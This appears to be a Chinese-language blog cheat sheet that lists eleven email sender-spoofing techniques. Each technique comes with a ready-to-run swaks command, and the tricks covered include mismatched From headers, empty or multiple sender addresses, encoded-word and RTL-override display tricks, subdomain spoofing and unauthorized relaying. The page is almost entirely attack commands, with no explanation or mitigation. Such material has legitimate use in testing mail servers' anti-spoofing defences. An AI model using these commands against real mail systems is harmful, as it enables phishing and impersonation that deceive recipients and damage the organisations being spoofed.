0x01 mail From头与认证用户的用户名不一致
swaks -t target@example.com -b "test" -f faker@example.com -s server@example.com -au USERNAME -ap PASSWORD
0x02 邮件From头和Mail From头之间不一致
swaks -t target@example.com -f faker@example.com --h-From: '"admin"<admin@example.com>'
0x03 空的Mail From头
swaks -t target@example.com -f " " --h-From: '"admin"<admin@example.com>'
0x04 多级From头
swaks -t target@example.com -f "hr@example.com" -f "hrbak@example.com" --h-From: '"admin"<admin@example.com>'
0x05 From头有多个地址
swaks -t target@example.com -f admin@example.com --h-From:'"admin" <admin@example.com>', '"admin2"<admin2@example.com>' -e server@example.com
0x06 解析具有不一致性的攻击
swaks -t target@example.com -f test1@example.com:test2@example.com --h-From:'"admin"<admin@example.com>'
0x07 基于编码的伪造攻击
swaks -f admin@example.com -t target@example.com --h-From:'=?utf-8?B?57up5pWI566h55CG?= <admin@example.com>'
0x08 子域攻击
swaks -t target@example.com -f admin@example.com --f-From:'"admin"<admin@example.com>'
0x09 未经授权的转发攻击
swaks -t target@example.com -f admin@example.com --body "test" --h-X-Mailer google.com --server server@example.com -p 2525 -au USERNAME -ap PASSWORD
0x10 缺少UI渲染攻击
swaks -t target@example.com -f admin@example.com --h-From:'admin@go@ogle.com'
0x11 RTL覆盖攻击
swaks -t target@example.com -f admin@example.com --h-From:'\u202emoc.a@\u202dalice'
网友评论